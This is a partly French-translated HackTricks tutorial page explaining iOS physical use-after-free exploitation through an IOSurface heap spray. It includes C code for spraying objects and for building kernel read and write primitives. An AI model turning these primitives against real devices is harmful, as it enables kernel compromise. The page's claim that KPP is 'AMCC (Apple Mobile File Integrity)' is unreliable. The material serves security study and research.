iOS Physical Use After Free via IOSurface
Reading time: 13 minutes
tip
Apprenez et pratiquez le hacking AWS :
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP :
HackTricks Training GCP Red Team Expert (GRTE)
Apprenez et pratiquez le hacking Azure :
HackTricks Training Azure Red Team Expert (AzRTE)
Soutenir HackTricks
- Vérifiez les plans d'abonnement !
- Rejoignez le đŹ groupe Discord ou le groupe telegram ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépÎts github.
iOS Exploit Mitigations
- Code Signing in iOS works by requiring every piece of executable code (apps, libraries, extensions, etc.) to be cryptographically signed with a certificate issued by Apple. When code is loaded, iOS verifies the digital signature against Appleâs trusted root. If the signature is invalid, missing, or modified, the OS refuses to run it. This prevents attackers from injecting malicious code into legitimate apps or running unsigned binaries, effectively stopping most exploit chains that rely on executing arbitrary or tampered code.
- CoreTrust is the iOS subsystem responsible for enforcing code signing at runtime. It directly verifies signatures using Appleâs root certificate without relying on cached trust stores, meaning only binaries signed by Apple (or with valid entitlements) can execute. CoreTrust ensures that even if an attacker tampers with an app after installation, modifies system libraries, or tries to load unsigned code, the system will block execution unless the code is still properly signed. This strict enforcement closes many post-exploitation vectors that older iOS versions allowed through weaker or bypassable signature checks.
- Data Execution Prevention (DEP) marque des rĂ©gions mĂ©moire comme non-exĂ©cutables sauf si elles contiennent explicitement du code. Cela empĂȘche les attaquants dâinjecter du shellcode dans des rĂ©gions de donnĂ©es (comme la stack ou le heap) et de lâexĂ©cuter, les forçant Ă utiliser des techniques plus complexes comme ROP (Return-Oriented Programming).
- ASLR (Address Space Layout Randomization) randomise les adresses mĂ©moire du code, des bibliothĂšques, de la stack et du heap Ă chaque exĂ©cution du systĂšme. Cela complique Ă©normĂ©ment la prĂ©diction de lâemplacement dâinstructions ou de gadgets utiles, brisant de nombreuses chaĂźnes dâexploit qui dĂ©pendent dâun layout mĂ©moire fixe.
- KASLR (Kernel ASLR) applique le mĂȘme concept de randomisation au kernel iOS. En dĂ©plaçant lâadresse de base du kernel Ă chaque boot, il empĂȘche les attaquants de localiser de maniĂšre fiable les fonctions ou structures du kernel, augmentant la difficultĂ© des exploits au niveau kernel visant Ă prendre le contrĂŽle total du systĂšme.
- Kernel Patch Protection (KPP), aussi connu sous le nom AMCC (Apple Mobile File Integrity) sur iOS, surveille en continu les pages de code du kernel pour sâassurer quâelles nâont pas Ă©tĂ© modifiĂ©es. Si une altĂ©ration est dĂ©tectĂ©e â par exemple un exploit tentant de patcher des fonctions du kernel ou dâinsĂ©rer du code malveillant â lâappareil va paniquer et redĂ©marrer immĂ©diatement. Cette protection rend les exploits persistants du kernel beaucoup plus difficiles, car les attaquants ne peuvent pas hooker ou patcher les instructions du kernel sans provoquer un crash systĂšme.
- Kernel Text Readonly Region (KTRR) est une fonctionnalitĂ© matĂ©rielle introduite sur les appareils iOS. Elle utilise le contrĂŽleur mĂ©moire du CPU pour marquer la section code (text) du kernel comme dĂ©finitivement en lecture seule aprĂšs le boot. Une fois verrouillĂ©e, mĂȘme le kernel luiâmĂȘme ne peut pas modifier cette rĂ©gion mĂ©moire. Cela empĂȘche les attaquants â et mĂȘme du code privilĂ©giĂ© â de patcher les instructions du kernel Ă lâexĂ©cution, fermant une grande classe dâexploits qui dĂ©pendaient de la modification directe du code kernel.
- Pointer Authentication Codes (PAC) utilisent des signatures cryptographiques intĂ©grĂ©es dans des bits inutilisĂ©s des pointeurs pour vĂ©rifier leur intĂ©gritĂ© avant utilisation. Lorsquâun pointeur (comme une adresse de retour ou un function pointer) est créé, le CPU le signe avec une clĂ© secrĂšte ; avant la dĂ©rĂ©fĂ©rence, le CPU vĂ©rifie la signature. Si le pointeur a Ă©tĂ© altĂ©rĂ©, la vĂ©rification Ă©choue et lâexĂ©cution sâarrĂȘte. Cela empĂȘche les attaquants de forger ou de rĂ©utiliser des pointeurs corrompus dans des exploits de corruption mĂ©moire, rendant des techniques comme ROP ou JOP beaucoup plus difficiles Ă rĂ©aliser de maniĂšre fiable.
- Privilege Access never (PAN) est une fonctionnalitĂ© matĂ©rielle qui empĂȘche le kernel (mode privilĂ©giĂ©) dâaccĂ©der directement Ă la mĂ©moire user-space Ă moins dâactiver explicitement cet accĂšs. Cela stoppe les attaquants qui ont obtenu lâexĂ©cution de code kernel de lire ou dâĂ©crire facilement la mĂ©moire utilisateur pour escalader des privilĂšges ou voler des donnĂ©es sensibles. En imposant une sĂ©paration stricte, PAN rĂ©duit lâimpact des exploits kernel et bloque de nombreuses techniques courantes dâescalade de privilĂšges.
- Page Protection Layer (PPL) est un mĂ©canisme de sĂ©curitĂ© iOS qui protĂšge des rĂ©gions mĂ©moire critiques gĂ©rĂ©es par le kernel, en particulier celles liĂ©es au code signing et aux entitlements. Il impose des protections dâĂ©criture strictes en utilisant la MMU (Memory Management Unit) et des vĂ©rifications additionnelles, garantissant que mĂȘme du code kernel privilĂ©giĂ© ne peut pas modifier arbitrairement des pages sensibles. Cela empĂȘche les attaquants ayant obtenu lâexĂ©cution au niveau kernel de manipuler des structures critiques de sĂ©curitĂ©, rendant la persistance et les contournements de code signing significativement plus difficiles.
Physical use-after-free
Ceci est un rĂ©sumĂ© du post disponible sur https://alfiecg.uk/2024/09/24/Kernel-exploit.html ; plus dâinformations sur des exploits utilisant cette technique se trouvent Ă©galement sur https://github.com/felix-pb/kfd
Memory management in XNU
The virtual memory address space for user processes on iOS spans from 0x0 to 0x8000000000. However, these addresses donât directly map to physical memory. Instead, the kernel uses page tables to translate virtual addresses into actual physical addresses.
Levels of Page Tables in iOS
Page tables are organized hierarchically in three levels:
- L1 Page Table (Level 1):
- Each entry here represents a large range of virtual memory.
- It covers 0x1000000000 bytes (or 256 GB) of virtual memory.
- L2 Page Table (Level 2):
- An entry here represents a smaller region of virtual memory, specifically 0x2000000 bytes (32 MB).
- An L1 entry may point to an L2 table if it can't map the entire region itself.
- L3 Page Table (Level 3):
- This is the finest level, where each entry maps a single 4 KB memory page.
- An L2 entry may point to an L3 table if more granular control is needed.
Mapping Virtual to Physical Memory
- Direct Mapping (Block Mapping):
- Some entries in a page table directly map a range of virtual addresses to a contiguous range of physical addresses (like a shortcut).
- Pointer to Child Page Table:
- If finer control is needed, an entry in one level (e.g., L1) can point to a child page table at the next level (e.g., L2).
Example: Mapping a Virtual Address
Letâs say you try to access the virtual address 0x1000000000:
- L1 Table:
- The kernel checks the L1 page table entry corresponding to this virtual address. If it has a pointer to an L2 page table, it goes to that L2 table.
- L2 Table:
- The kernel checks the L2 page table for a more detailed mapping. If this entry points to an L3 page table, it proceeds there.
- L3 Table:
- The kernel looks up the final L3 entry, which points to the physical address of the actual memory page.
Example of Address Mapping
If you write the physical address 0x800004000 into the first index of the L2 table, then:
- Virtual addresses from 0x1000000000 to 0x1002000000 map to physical addresses from 0x800004000 to 0x802004000.
- This is a block mapping at the L2 level.
Alternatively, if the L2 entry points to an L3 table:
- Each 4 KB page in the virtual address range 0x1000000000 -> 0x1002000000 would be mapped by individual entries in the L3 table.
Physical use-after-free
A physical use-after-free (UAF) occurs when:
- A process allocates some memory as readable and writable.
- The page tables are updated to map this memory to a specific physical address that the process can access.
- The process deallocates (frees) the memory.
- However, due to a bug, the kernel forgets to remove the mapping from the page tables, even though it marks the corresponding physical memory as free.
- The kernel can then reallocate this "freed" physical memory for other purposes, like kernel data.
- Since the mapping wasnât removed, the process can still read and write to this physical memory.
This means the process can access pages of kernel memory, which could contain sensitive data or structures, potentially allowing an attacker to manipulate kernel memory.
IOSurface Heap Spray
Since the attacker canât control which specific kernel pages will be allocated to freed memory, they use a technique called heap spray:
- The attacker creates a large number of IOSurface objects in kernel memory.
- Each IOSurface object contains a magic value in one of its fields, making it easy to identify.
- They scan the freed pages to see if any of these IOSurface objects landed on a freed page.
- When they find an IOSurface object on a freed page, they can use it to read and write kernel memory.
More info about this in https://github.com/felix-pb/kfd/tree/main/writeups
tip
Be aware that iOS 16+ (A12+) devices bring hardware mitigations (like PPL or SPTM) that make physical UAF techniques far less viable.
PPL enforces strict MMU protections on pages related to code signing, entitlements, and sensitive kernel data, so, even if a page gets reused, writes from userland or compromised kernel code to PPL-protected pages are blocked.
Secure Page Table Monitor (SPTM) extends PPL by hardening page table updates themselves. It ensures that even privileged kernel code cannot silently remap freed pages or tamper with mappings without going through secure checks.
KTRR (Kernel Text Read-Only Region), which locks down the kernelâs code section as read-only after boot. This prevents any runtime modifications to kernel code, closing off a major attack vector that physical UAF exploits often rely on.
Moreover, IOSurface allocations are less predictable and harder to map into user-accessible regions, which makes the âmagic value scanningâ trick much less reliable. And IOSurface is now guarded by entitlements and sandbox restrictions.
Step-by-Step Heap Spray Process
- Spray IOSurface Objects: The attacker creates many IOSurface objects with a special identifier ("magic value").
- Scan Freed Pages: They check if any of the objects have been allocated on a freed page.
- Read/Write Kernel Memory: By manipulating fields in the IOSurface object, they gain the ability to perform arbitrary reads and writes in kernel memory. This lets them:
- Use one field to read any 32-bit value in kernel memory.
- Use another field to write 64-bit values, achieving a stable kernel read/write primitive.
Generate IOSurface objects with the magic value IOSURFACE_MAGIC to later search for:
void spray_iosurface(io_connect_t client, int nSurfaces, io_connect_t **clients, int *nClients) {
if (*nClients >= 0x4000) return;
for (int i = 0; i < nSurfaces; i++) {
fast_create_args_t args;
lock_result_t result;
size_t size = IOSurfaceLockResultSize;
args.address = 0;
args.alloc_size = *nClients + 1;
args.pixel_format = IOSURFACE_MAGIC;
IOConnectCallMethod(client, 6, 0, 0, &args, 0x20, 0, 0, &result, &size);
io_connect_t id = result.surface_id;
(*clients)[*nClients] = id;
*nClients = (*nClients) += 1;
}
}
Rechercher des objets IOSurface dans une page physique libérée :
int iosurface_krw(io_connect_t client, uint64_t *puafPages, int nPages, uint64_t *self_task, uint64_t *puafPage) {
io_connect_t *surfaceIDs = malloc(sizeof(io_connect_t) * 0x4000);
int nSurfaceIDs = 0;
for (int i = 0; i < 0x400; i++) {
spray_iosurface(client, 10, &surfaceIDs, &nSurfaceIDs);
for (int j = 0; j < nPages; j++) {
uint64_t start = puafPages[j];
uint64_t stop = start + (pages(1) / 16);
for (uint64_t k = start; k < stop; k += 8) {
if (iosurface_get_pixel_format(k) == IOSURFACE_MAGIC) {
info.object = k;
info.surface = surfaceIDs[iosurface_get_alloc_size(k) - 1];
if (self_task) *self_task = iosurface_get_receiver(k);
goto sprayDone;
}
}
}
}
sprayDone:
for (int i = 0; i < nSurfaceIDs; i++) {
if (surfaceIDs[i] == info.surface) continue;
iosurface_release(client, surfaceIDs[i]);
}
free(surfaceIDs);
return 0;
}
Obtenir des opérations de lecture/écriture kernel avec IOSurface
AprÚs avoir pris le contrÎle d'un objet IOSurface dans la mémoire kernel (mappé sur une page physique libérée accessible depuis userspace), on peut l'utiliser pour des opérations de lecture et écriture kernel arbitraires.
Champs clés dans IOSurface
L'objet IOSurface possĂšde deux champs cruciaux :
- Use Count Pointer : Permet une lecture 32-bit.
- Indexed Timestamp Pointer : Permet une écriture 64-bit.
En écrasant ces pointeurs, on les redirige vers des adresses arbitraires en mémoire kernel, activant des capacités de lecture/écriture.
Lecture kernel 32-bit
Pour effectuer une lecture :
- Ăcraser le use count pointer pour qu'il pointe vers l'adresse cible moins un offset de 0x14 octets.
- Utiliser la méthode
get_use_countpour lire la valeur Ă cette adresse.
uint32_t get_use_count(io_connect_t client, uint32_t surfaceID) {
uint64_t args[1] = {surfaceID};
uint32_t size = 1;
uint64_t out = 0;
IOConnectCallMethod(client, 16, args, 1, 0, 0, &out, &size, 0, 0);
return (uint32_t)out;
}
uint32_t iosurface_kread32(uint64_t addr) {
uint64_t orig = iosurface_get_use_count_pointer(info.object);
iosurface_set_use_count_pointer(info.object, addr - 0x14); // Offset by 0x14
uint32_t value = get_use_count(info.client, info.surface);
iosurface_set_use_count_pointer(info.object, orig);
return value;
}
Ăcriture 64 bits dans le kernel
Pour effectuer une écriture :
- Ăcraser le indexed timestamp pointer pour qu'il pointe vers l'adresse cible.
- Utiliser la méthode
set_indexed_timestamppour écrire une valeur 64 bits.
void set_indexed_timestamp(io_connect_t client, uint32_t surfaceID, uint64_t value) {
uint64_t args[3] = {surfaceID, 0, value};
IOConnectCallMethod(client, 33, args, 3, 0, 0, 0, 0, 0, 0);
}
void iosurface_kwrite64(uint64_t addr, uint64_t value) {
uint64_t orig = iosurface_get_indexed_timestamp_pointer(info.object);
iosurface_set_indexed_timestamp_pointer(info.object, addr);
set_indexed_timestamp(info.client, info.surface, value);
iosurface_set_indexed_timestamp_pointer(info.object, orig);
}
Exploit Flow Recap
- Trigger Physical Use-After-Free: Des pages libérées sont disponibles pour réutilisation.
- Spray IOSurface Objects: Allouer de nombreux objets IOSurface avec une "magic value" unique dans kernel memory.
- Identify Accessible IOSurface: Localiser un IOSurface sur une page libérée que vous contrÎlez.
- Abuse Use-After-Free: Modifier les pointeurs dans l'objet IOSurface pour permettre des kernel read/write arbitraires via les méthodes IOSurface.
Avec ces primitives, l'exploit fournit des 32-bit reads contrÎlés et des 64-bit writes vers le kernel memory. D'autres étapes de jailbreak pourraient impliquer des primitives de read/write plus stables, qui peuvent nécessiter de contourner des protections supplémentaires (par ex., PPL sur les appareils arm64e plus récents).
tip
Apprenez et pratiquez le hacking AWS :
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP :
HackTricks Training GCP Red Team Expert (GRTE)
Apprenez et pratiquez le hacking Azure :
HackTricks Training Azure Red Team Expert (AzRTE)
Soutenir HackTricks
- Vérifiez les plans d'abonnement !
- Rejoignez le đŹ groupe Discord ou le groupe telegram ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépÎts github.
HackTricks